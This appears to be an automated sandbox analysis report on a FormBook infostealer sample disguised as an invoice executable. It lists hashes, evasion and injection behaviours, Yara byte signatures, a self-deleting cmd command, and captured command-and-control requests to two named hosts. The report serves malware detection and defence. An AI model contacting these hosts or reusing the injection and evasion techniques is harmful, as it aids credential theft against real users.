
Analysis Report CI_PL #WS190903_20201016_XLs.exe

Overview

General Information

Sample Name: CI_PL #WS190903_20201016_XLs.exe
Analysis ID: 299346
MD5: d2041309d6ef5c0742820fc656d9b24c
SHA1: 47050374dabe4e3c3a6b260ee7a515b2c9139c50
SHA256: d085d4d4370b02036dfe9de7c9061d88a8a5cd12cbced6dbdca9ba217112375c
Tags: exe, Formbook


Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
System process connects to network (likely due to code injection or exploit)
Yara detected AntiVM_3
Yara detected FormBook
.NET source code contains potential unpacker
Injects a PE file into a foreign processes
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect virtualization through RDTSC time measurements
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Startup

  • System is w10x64
  • CI_PL #WS190903_20201016_XLs.exe (PID: 7032 cmdline: 'C:\Users\user\Desktop\CI_PL #WS190903_20201016_XLs.exe' MD5: D2041309D6EF5C0742820FC656D9B24C)
    • CI_PL #WS190903_20201016_XLs.exe (PID: 6008 cmdline: {path} MD5: D2041309D6EF5C0742820FC656D9B24C)
      • explorer.exe (PID: 3424 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • cmmon32.exe (PID: 6684 cmdline: C:\Windows\SysWOW64\cmmon32.exe MD5: 2879B30A164B9F7671B5E6B2E9F8DFDA)
          • cmd.exe (PID: 7020 cmdline: /c del 'C:\Users\user\Desktop\CI_PL #WS190903_20201016_XLs.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 6796 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
00000005.00000002.911663684.0000000004BC0000.00000004.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
00000005.00000002.911663684.0000000004BC0000.00000004.00000001.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x1b327:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1c32a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000005.00000002.911663684.0000000004BC0000.00000004.00000001.sdmp | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
  • 0x18409:$sqlite3step: 68 34 1C 7B E1
  • 0x1851c:$sqlite3step: 68 34 1C 7B E1
  • 0x18438:$sqlite3text: 68 38 2A 90 C5
  • 0x1855d:$sqlite3text: 68 38 2A 90 C5
  • 0x1844b:$sqlite3blob: 68 53 D8 7F 8C
  • 0x18573:$sqlite3blob: 68 53 D8 7F 8C
00000005.00000002.911632100.0000000004B90000.00000040.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
00000005.00000002.911632100.0000000004B90000.00000040.00000001.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x1b327:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1c32a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00

Unpacked PEs

Source | Rule | Description | Author | Strings
2.2.CI_PL #WS190903_20201016_XLs.exe.400000.0.raw.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
2.2.CI_PL #WS190903_20201016_XLs.exe.400000.0.raw.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x1b327:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1c32a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
2.2.CI_PL #WS190903_20201016_XLs.exe.400000.0.raw.unpack | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
  • 0x18409:$sqlite3step: 68 34 1C 7B E1
  • 0x1851c:$sqlite3step: 68 34 1C 7B E1
  • 0x18438:$sqlite3text: 68 38 2A 90 C5
  • 0x1855d:$sqlite3text: 68 38 2A 90 C5
  • 0x1844b:$sqlite3blob: 68 53 D8 7F 8C
  • 0x18573:$sqlite3blob: 68 53 D8 7F 8C
2.2.CI_PL #WS190903_20201016_XLs.exe.400000.0.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
2.2.CI_PL #WS190903_20201016_XLs.exe.400000.0.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x8ae8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x8d62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x14885:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x14371:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x14987:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x14aff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x977a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x135ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xa473:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x1a527:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1b52a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00

Sigma Overview

No Sigma rule has matched

Signature Overview


AV Detection:

Multi AV Scanner detection for submitted file
Source: CI_PL #WS190903_20201016_XLs.exe | Virustotal: Detection: 31%
Source: CI_PL #WS190903_20201016_XLs.exe | ReversingLabs: Detection: 20%
Yara detected FormBook
Source: Yara match | File source: 00000005.00000002.911663684.0000000004BC0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.911632100.0000000004B90000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.695420976.00000000013C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.910775830.0000000000E40000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.693748747.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.695379204.0000000001390000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.657434154.0000000003521000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 2.2.CI_PL #WS190903_20201016_XLs.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.CI_PL #WS190903_20201016_XLs.exe.400000.0.unpack, type: UNPACKEDPE
Machine Learning detection for sample
Source: CI_PL #WS190903_20201016_XLs.exe | Joe Sandbox ML: detected
Source: 2.2.CI_PL #WS190903_20201016_XLs.exe.400000.0.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: global traffic | HTTP traffic detected: GET /sdk/?LnH4=8pp8IDzH80h&-ZWX1N2=myg/CAvWrPYdGYT5wN73cqOckDK6ZKz53/JvHozq4ZRCiAkAkRh0aYFAJGqSMOAqaNFA HTTP/1.1 | Host: www.shadent.store | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /sdk/?-ZWX1N2=PZBhkyCRsI7z3E3t6IMGOfWYQMWca0Lqu1pX8CEJNV9yquxtIMxAzgOdmelb0pkJs94k&LnH4=8pp8IDzH80h HTTP/1.1 | Host: www.hazyblurcreative.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: Joe Sandbox View | ASN Name: BIZLAND-SDUS BIZLAND-SDUS
Source: Joe Sandbox View | ASN Name: POWERLINE-AS-APPOWERLINEDATACENTERHK POWERLINE-AS-APPOWERLINEDATACENTERHK
Source: global traffic | HTTP traffic detected: GET /sdk/?LnH4=8pp8IDzH80h&-ZWX1N2=myg/CAvWrPYdGYT5wN73cqOckDK6ZKz53/JvHozq4ZRCiAkAkRh0aYFAJGqSMOAqaNFA HTTP/1.1 | Host: www.shadent.store | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /sdk/?-ZWX1N2=PZBhkyCRsI7z3E3t6IMGOfWYQMWca0Lqu1pX8CEJNV9yquxtIMxAzgOdmelb0pkJs94k&LnH4=8pp8IDzH80h HTTP/1.1 | Host: www.hazyblurcreative.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: unknown | DNS traffic detected: queries for: www.shadent.store
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Fri, 16 Oct 2020 14:43:55 GMT | Content-Type: text/html | Content-Length: 867 | Connection: close | Server: Apache/2 | Last-Modified: Fri, 10 Jan 2020 16:05:10 GMT | Accept-Ranges: bytes | Accept-Ranges: bytes | Age: 0 | Data Ascii: <!DOCTYPE HTML><html> <head> <title>404 Error - Page Not Found</title> <style> #ad_frame{ hei
Source: explorer.exe, 00000003.00000000.676870007.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://fontfabrik.com
Source: explorer.exe, 00000003.00000002.912144514.0000000002B50000.00000002.00000001.sdmp | String found in binary or memory: http://www.%s.comPA
Source: explorer.exe, 00000003.00000000.676870007.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: explorer.exe, 00000003.00000000.676870007.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.carterandcone.coml
Source: explorer.exe, 00000003.00000000.676870007.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com
Source: explorer.exe, 00000003.00000000.676870007.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers
Source: explorer.exe, 00000003.00000000.676870007.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/?
Source: explorer.exe, 00000003.00000000.676870007.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: explorer.exe, 00000003.00000000.676870007.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
Source: explorer.exe, 00000003.00000000.676870007.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers8
Source: explorer.exe, 00000003.00000000.676870007.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers?
Source: explorer.exe, 00000003.00000000.676870007.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designersG
Source: explorer.exe, 00000003.00000000.676870007.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.fonts.com
Source: explorer.exe, 00000003.00000000.676870007.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn
Source: explorer.exe, 00000003.00000000.676870007.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: explorer.exe, 00000003.00000000.676870007.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: explorer.exe, 00000003.00000000.676870007.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: explorer.exe, 00000003.00000000.676870007.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: explorer.exe, 00000003.00000000.676870007.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.goodfont.co.kr
Source: explorer.exe, 00000003.00000000.676870007.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: explorer.exe, 00000003.00000000.676870007.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.sajatypeworks.com
Source: explorer.exe, 00000003.00000000.676870007.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.sakkal.com
Source: explorer.exe, 00000003.00000000.676870007.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.sandoll.co.kr
Source: cmmon32.exe, 00000005.00000002.912619083.000000000578F000.00000004.00000001.sdmp | String found in binary or memory: http://www.searchvity.com/
Source: cmmon32.exe, 00000005.00000002.912619083.000000000578F000.00000004.00000001.sdmp | String found in binary or memory: http://www.searchvity.com/?dn=
Source: explorer.exe, 00000003.00000000.676870007.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.tiro.com
Source: explorer.exe, 00000003.00000000.676870007.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.typography.netD
Source: explorer.exe, 00000003.00000000.676870007.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.urwpp.deDPlease
Source: explorer.exe, 00000003.00000000.676870007.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.zhongyicts.com.cn

E-Banking Fraud:

Yara detected FormBook
Source: Yara match | File source: 00000005.00000002.911663684.0000000004BC0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.911632100.0000000004B90000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.695420976.00000000013C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.910775830.0000000000E40000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.693748747.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.695379204.0000000001390000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.657434154.0000000003521000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 2.2.CI_PL #WS190903_20201016_XLs.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.CI_PL #WS190903_20201016_XLs.exe.400000.0.unpack, type: UNPACKEDPE

System Summary:

Malicious sample detected (through community Yara rule)
Source: 00000005.00000002.911663684.0000000004BC0000.00000004.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000002.911663684.0000000004BC0000.00000004.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 00000005.00000002.911632100.0000000004B90000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000002.911632100.0000000004B90000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 00000002.00000002.695420976.00000000013C0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000002.00000002.695420976.00000000013C0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 00000005.00000002.910775830.0000000000E40000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000002.910775830.0000000000E40000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 00000002.00000002.693748747.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000002.00000002.693748747.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 00000002.00000002.695379204.0000000001390000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000002.00000002.695379204.0000000001390000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.657434154.0000000003521000.00000004.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000000.00000002.657434154.0000000003521000.00000004.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 2.2.CI_PL #WS190903_20201016_XLs.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 2.2.CI_PL #WS190903_20201016_XLs.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 2.2.CI_PL #WS190903_20201016_XLs.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 2.2.CI_PL #WS190903_20201016_XLs.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: C:\Users\user\Desktop\CI_PL #WS190903_20201016_XLs.exe | Code function: 2_2_00419D60 NtCreateFile | 2_2_00419D60
Source: C:\Users\user\Desktop\CI_PL #WS190903_20201016_XLs.exe | Code function: 2_2_00419E10 NtReadFile | 2_2_00419E10
Source: C:\Users\user\Desktop\CI_PL #WS190903_20201016_XLs.exe | Code function: 2_2_00419E90 NtClose | 2_2_00419E90
Source: C:\Users\user\Desktop\CI_PL #WS190903_20201016_XLs.exe | Code function: 2_2_00419F40 NtAllocateVirtualMemory | 2_2_00419F40
Source: C:\Users\user\Desktop\CI_PL #WS190903_20201016_XLs.exe | Code function: 2_2_00419D5A NtCreateFile | 2_2_00419D5A
Source: C:\Users\user\Desktop\CI_PL #WS190903_20201016_XLs.exe | Code function: 2_2_00419DB2 NtReadFile | 2_2_00419DB2
Source: C:\Users\user\Desktop\CI_PL #WS190903_20201016_XLs.exe | Code function: 2_2_00419E0A NtReadFile | 2_2_00419E0A
Source: C:\Users\user\Desktop\CI_PL #WS190903_20201016_XLs.exe | Code function: 2_2_00419E8E NtClose | 2_2_00419E8E
Source: C:\Users\user\Desktop\CI_PL #WS190903_20201016_XLs.exe | Code function: 2_2_00419F3B NtAllocateVirtualMemory | 2_2_00419F3B
Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 5_2_04D395D0 NtClose, LdrInitializeThunk | 5_2_04D395D0
Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 5_2_04D39540 NtReadFile, LdrInitializeThunk | 5_2_04D39540
Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 5_2_04D396D0 NtCreateKey, LdrInitializeThunk | 5_2_04D396D0
Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 5_2_04D396E0 NtFreeVirtualMemory, LdrInitializeThunk | 5_2_04D396E0
Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 5_2_04D39650 NtQueryValueKey, LdrInitializeThunk | 5_2_04D39650
Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 5_2_04D39660 NtAllocateVirtualMemory, LdrInitializeThunk | 5_2_04D39660
Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 5_2_04D39FE0 NtCreateMutant, LdrInitializeThunk | 5_2_04D39FE0
Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 5_2_04D39780 NtMapViewOfSection, LdrInitializeThunk | 5_2_04D39780
Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 5_2_04D39710 NtQueryInformationToken, LdrInitializeThunk | 5_2_04D39710
Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 5_2_04D39840 NtDelayExecution, LdrInitializeThunk | 5_2_04D39840
Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 5_2_04D39860 NtQuerySystemInformation, LdrInitializeThunk | 5_2_04D39860
Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 5_2_04D399A0 NtCreateSection, LdrInitializeThunk | 5_2_04D399A0
Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 5_2_04D39910 NtAdjustPrivilegesToken, LdrInitializeThunk | 5_2_04D39910
Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 5_2_04D39A50 NtCreateFile, LdrInitializeThunk | 5_2_04D39A50
Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 5_2_04D395F0 NtQueryInformationFile | 5_2_04D395F0
Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 5_2_04D39560 NtWriteFile | 5_2_04D39560
Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 5_2_04D3AD30 NtSetContextThread | 5_2_04D3AD30
Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 5_2_04D39520 NtWaitForSingleObject | 5_2_04D39520
Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 5_2_04D39670 NtQueryInformationProcess | 5_2_04D39670
Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 5_2_04D39610 NtEnumerateValueKey | 5_2_04D39610
Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 5_2_04D397A0 NtUnmapViewOfSection | 5_2_04D397A0
Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 5_2_04D3A770 NtOpenThread | 5_2_04D3A770
Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 5_2_04D39770 NtSetInformationFile | 5_2_04D39770
Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 5_2_04D39760 NtOpenProcess | 5_2_04D39760
Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 5_2_04D3A710 NtOpenProcessToken | 5_2_04D3A710
Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 5_2_04D39730 NtQueryVirtualMemory | 5_2_04D39730
Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 5_2_04D398F0 NtReadVirtualMemory | 5_2_04D398F0
Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 5_2_04D398A0 NtWriteVirtualMemory | 5_2_04D398A0
Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 5_2_04D3B040 NtSuspendThread | 5_2_04D3B040
Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 5_2_04D39820 NtEnumerateKey | 5_2_04D39820
Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 5_2_04D399D0 NtCreateProcessEx | 5_2_04D399D0
Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 5_2_04D39950 NtQueueApcThread | 5_2_04D39950
Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 5_2_04D39A80 NtOpenDirectoryObject | 5_2_04D39A80
Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 5_2_04D39A10 NtQuerySection | 5_2_04D39A10
Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 5_2_04D39A00 NtProtectVirtualMemory | 5_2_04D39A00
Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 5_2_04D39A20 NtResumeThread | 5_2_04D39A20
Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 5_2_04D3A3B0 NtGetContextThread | 5_2_04D3A3B0
Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 5_2_04D39B00 NtSetValueKey | 5_2_04D39B00
Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 5_2_00E59D60 NtCreateFile | 5_2_00E59D60
Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 5_2_00E59E90 NtClose | 5_2_00E59E90
Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 5_2_00E59E10 NtReadFile | 5_2_00E59E10
Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 5_2_00E59F40 NtAllocateVirtualMemory | 5_2_00E59F40
Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 5_2_00E59DB2 NtReadFile | 5_2_00E59DB2
Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 5_2_00E59D5A NtCreateFile | 5_2_00E59D5A
Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 5_2_00E59E8E NtClose | 5_2_00E59E8E
Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 5_2_00E59E0A NtReadFile | 5_2_00E59E0A
Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 5_2_00E59F3B NtAllocateVirtualMemory | 5_2_00E59F3B
Source: C:\Users\user\Desktop\CI_PL #WS190903_20201016_XLs.exe | Code function: 0_2_022FC21C | 0_2_022FC21C
Source: C:\Users\user\Desktop\CI_PL #WS190903_20201016_XLs.exe | Code function: 0_2_022FEBF8 | 0_2_022FEBF8
Source: C:\Users\user\Desktop\CI_PL #WS190903_20201016_XLs.exe | Code function: 0_2_022FEBF4 | 0_2_022FEBF4
Source: C:\Users\user\Desktop\CI_PL #WS190903_20201016_XLs.exe | Code function: 0_2_045215E2 | 0_2_045215E2
Source: C:\Users\user\Desktop\CI_PL #WS190903_20201016_XLs.exe | Code function: 0_2_04521078 | 0_2_04521078
Source: C:\Users\user\Desktop\CI_PL #WS190903_20201016_XLs.exe | Code function: 0_2_04521390 | 0_2_04521390
Source: C:\Users\user\Desktop\CI_PL #WS190903_20201016_XLs.exe | Code function: 0_2_04523EB7 | 0_2_04523EB7
Source: C:\Users\user\Desktop\CI_PL #WS190903_20201016_XLs.exe | Code function: 0_2_0452165E | 0_2_0452165E
Source: C:\Users\user\Desktop\CI_PL #WS190903_20201016_XLs.exe | Code function: 0_2_0452167A | 0_2_0452167A
Source: C:\Users\user\Desktop\CI_PL #WS190903_20201016_XLs.exe | Code function: 0_2_04521068 | 0_2_04521068
Source: C:\Users\user\Desktop\CI_PL #WS190903_20201016_XLs.exe | Code function: 0_2_04521381 | 0_2_04521381
Source: C:\Users\user\Desktop\CI_PL #WS190903_20201016_XLs.exe | Code function: 0_2_04520D98 | 0_2_04520D98
Source: C:\Users\user\Desktop\CI_PL #WS190903_20201016_XLs.exe | Code function: 0_2_04520D88 | 0_2_04520D88
Source: C:\Users\user\Desktop\CI_PL #WS190903_20201016_XLs.exe | Code function: 2_2_00401030 | 2_2_00401030
Source: C:\Users\user\Desktop\CI_PL #WS190903_20201016_XLs.exe | Code function: 2_2_0041D892 | 2_2_0041D892
Source: C:\Users\user\Desktop\CI_PL #WS190903_20201016_XLs.exe | Code function: 2_2_0041E25C | 2_2_0041E25C
Source: C:\Users\user\Desktop\CI_PL #WS190903_20201016_XLs.exe | Code function: 2_2_0041DA86 | 2_2_0041DA86
